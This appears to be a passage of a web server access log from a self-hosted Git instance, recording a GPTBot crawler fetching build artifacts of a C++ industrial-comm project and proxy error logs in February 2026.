"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10395] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9962] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10276] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12880] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11863] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10195] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11063] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70935] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44563] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11087] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17014] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11056] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12918] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10948] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 21360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39447] [Gzip 31.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39470] [Gzip 31.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17935] [Gzip 11.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12858] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44535] [Gzip 32.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 160830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 91165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 16373] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17084] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip 